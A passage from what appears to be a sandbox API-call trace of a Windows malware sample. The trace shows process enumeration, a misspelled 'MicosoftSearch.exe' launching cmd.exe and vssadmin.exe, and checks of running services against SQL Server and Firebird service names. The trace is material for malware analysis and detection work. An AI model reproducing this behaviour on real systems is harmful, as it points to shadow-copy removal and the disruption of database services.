th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.505] lstrlenW (lpString="csrss.exe") returned 9 [0049.505] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0049.505] lstrlenW (lpString="winlogon.exe") returned 12 [0049.505] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0049.506] lstrlenW (lpString="services.exe") returned 12 [0049.506] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0049.507] lstrlenW (lpString="lsass.exe") returned 9 [0049.507] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0049.508] lstrlenW (lpString="lsm.exe") returned 7 [0049.508] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.509] lstrlenW (lpString="svchost.exe") returned 11 [0049.509] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.509] lstrlenW (lpString="svchost.exe") returned 11 [0049.509] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.510] lstrlenW (lpString="svchost.exe") returned 11 [0049.510] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.511] lstrlenW (lpString="svchost.exe") returned 11 [0049.511] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.512] lstrlenW (lpString="svchost.exe") returned 11 [0049.512] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0049.512] lstrlenW (lpString="audiodg.exe") returned 11 [0049.512] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.513] lstrlenW (lpString="svchost.exe") returned 11 [0049.513] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.514] lstrlenW (lpString="svchost.exe") returned 11 [0049.514] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0049.515] lstrlenW (lpString="dwm.exe") returned 7 [0049.515] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0049.515] lstrlenW (lpString="explorer.exe") returned 12 [0049.515] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0049.516] lstrlenW (lpString="spoolsv.exe") returned 11 [0049.516] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0049.517] lstrlenW (lpString="taskhost.exe") returned 12 [0049.517] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.518] lstrlenW (lpString="svchost.exe") returned 11 [0049.518] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0049.519] lstrlenW (lpString="taskeng.exe") returned 11 [0049.519] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0049.519] lstrlenW (lpString="taskhost.exe") returned 12 [0049.519] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0049.520] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0049.520] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0049.521] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0049.521] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0049.521] lstrlenW (lpString="sa_shape.exe") returned 12 [0049.522] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0049.645] lstrlenW (lpString="confidence.exe") returned 14 [0049.645] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0049.647] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0049.647] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0049.647] lstrlenW (lpString="blue.exe") returned 8 [0049.648] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0049.648] lstrlenW (lpString="newly debut.exe") returned 15 [0049.648] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0049.649] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0049.649] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0049.650] lstrlenW (lpString="archive.exe") returned 11 [0049.650] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0049.650] lstrlenW (lpString="defend.exe") returned 10 [0049.651] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0049.651] lstrlenW (lpString="arservice.exe") returned 13 [0049.651] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0049.652] lstrlenW (lpString="rr-programmer.exe") returned 17 [0049.652] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0049.653] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0049.653] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0049.654] lstrlenW (lpString="twistedmonton.exe") returned 17 [0049.654] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0049.655] lstrlenW (lpString="arc plains.exe") returned 14 [0049.655] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0049.656] lstrlenW (lpString="americahousestip.exe") returned 20 [0049.656] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0049.656] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0049.656] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0049.657] lstrlenW (lpString="medical lectures.exe") returned 20 [0049.657] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0049.658] lstrlenW (lpString="electronic.exe") returned 14 [0049.658] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0049.659] lstrlenW (lpString="regression.exe") returned 14 [0049.659] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0049.660] lstrlenW (lpString="county.exe") returned 10 [0049.660] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0049.660] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0049.661] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0049.661] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0049.661] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0049.662] lstrlenW (lpString="cmd.exe") returned 7 [0049.662] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.663] lstrlenW (lpString="conhost.exe") returned 11 [0049.663] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0049.663] lstrlenW (lpString="vssadmin.exe") returned 12 [0049.664] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0049.664] lstrlenW (lpString="VSSVC.exe") returned 9 [0049.664] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.665] lstrlenW (lpString="svchost.exe") returned 11 [0049.665] Process32NextW (in: hSnapshot=0x210, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0049.666] CloseHandle (hObject=0x210) returned 1 [0049.666] Sleep (dwMilliseconds=0x1f4) [0050.627] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232e50 [0050.628] EnumServicesStatusExW (in: hSCManager=0x4232e50, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0050.629] GetLastError () returned 0xea [0050.629] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xbc83f8 [0050.629] EnumServicesStatusExW (in: hSCManager=0x4232e50, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbc83f8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbc83f8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0050.630] CloseServiceHandle (hSCObject=0x4232e50) returned 1 [0050.630] lstrlenW (lpString="Appinfo") returned 7 [0050.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0050.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0050.630] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0050.630] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0050.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0050.630] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0050.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.630] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0050.630] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0050.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0050.631] lstrlenW (lpString="AudioSrv") returned 8 [0050.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0050.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0050.631] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0050.631] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0050.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0050.631] lstrlenW (lpString="BFE") returned 3 [0050.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0050.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0050.631] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0050.631] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0050.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0050.631] lstrlenW (lpString="CryptSvc") returned 8 [0050.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0050.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0050.631] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0050.631] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0050.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0050.631] lstrlenW (lpString="CscService") returned 10 [0050.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0050.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0050.631] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0050.631] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0050.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0050.631] lstrlenW (lpString="DcomLaunch") returned 10 [0050.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.631] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0050.631] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0050.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0050.631] lstrlenW (lpString="Dhcp") returned 4 [0050.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0050.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0050.632] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0050.632] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0050.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0050.632] lstrlenW (lpString="Dnscache") returned 8 [0050.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0050.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0050.632] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0050.632] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0050.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0050.632] lstrlenW (lpString="DPS") returned 3 [0050.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0050.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0050.632] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0050.632] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0050.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0050.632] lstrlenW (lpString="eventlog") returned 8 [0050.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0050.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0050.632] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0050.632] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0050.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0050.632] lstrlenW (lpString="EventSystem") returned 11 [0050.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0050.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0050.632] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0050.632] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0050.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0050.632] lstrlenW (lpString="gpsvc") returned 5 [0050.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0050.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0050.632] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0050.632] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0050.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0050.632] lstrlenW (lpString="iphlpsvc") returned 8 [0050.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.633] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0050.633] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0050.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0050.633] lstrlenW (lpString="LanmanServer") returned 12 [0050.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0050.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0050.633] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0050.633] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0050.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0050.633] lstrlenW (lpString="LanmanWorkstation") returned 17 [0050.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.633] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0050.633] 